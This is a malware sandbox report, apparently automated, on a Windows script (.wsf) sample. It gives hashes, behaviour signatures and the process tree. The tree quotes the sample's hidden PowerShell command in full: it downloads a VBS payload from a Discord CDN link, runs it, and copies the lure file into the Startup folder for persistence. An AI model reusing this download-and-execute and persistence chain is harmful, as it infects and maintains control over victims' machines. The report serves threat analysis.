Resubmissions

10/10/2022, 20:23

221010-y6fc6sdcdk 10

04/10/2022, 21:00

221004-ztcl7aced4 8

Analysis

  • max time kernel
    64s
  • max time network
    39s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/10/2022, 20:23

General

  • Target

    0f35bfed5b1817310378a5df58ca5fcd.wsf

  • Size

    84KB

  • MD5

    0f35bfed5b1817310378a5df58ca5fcd

  • SHA1

    3062b699b4944f3e70ee80127fe760a68fb3f453

  • SHA256

    bc07c50c0b92825bf9436f7a6816bd86c54f827c00c87304b63ff67ee05e695d

  • SHA512

    c14007ae998ac0bfa7816f314e0c42919c820651e327eb67f6c182e2bd2b0aa2fdef64d6b7f7f51471e6f4903a4e632d354bed5a49ad5f411801857abfc3e9c0

  • SSDEEP

    48:4sLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLG:tiJZ

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f35bfed5b1817310378a5df58ca5fcd.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1024684238085312517/1026668711156928603/Crpted.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('El presente es el requerimiento enviado a declarar por el proceso 0091-002018-0917875 .wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\дссвПЙ.wsf');Start-Sleep 1;rm *.uue,*.pif
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
        3⤵
          PID:1512
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      PID:1080

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1080-63-0x0000000003A00000-0x0000000003A10000-memory.dmp
    Filesize
    64KB

  • memory/1476-57-0x000007FEF4640000-0x000007FEF5063000-memory.dmp
    Filesize
    10.1MB

  • memory/1476-58-0x000007FEF38F0000-0x000007FEF444D000-memory.dmp
    Filesize
    11.4MB

  • memory/1476-59-0x0000000002514000-0x0000000002517000-memory.dmp
    Filesize
    12KB

  • memory/1476-64-0x000000000251B000-0x000000000253A000-memory.dmp
    Filesize
    124KB

  • memory/1476-65-0x0000000002514000-0x0000000002517000-memory.dmp
    Filesize
    12KB

  • memory/1476-66-0x000000000251B000-0x000000000253A000-memory.dmp
    Filesize
    124KB

  • memory/1488-54-0x000007FEFC001000-0x000007FEFC003000-memory.dmp
    Filesize
    8KB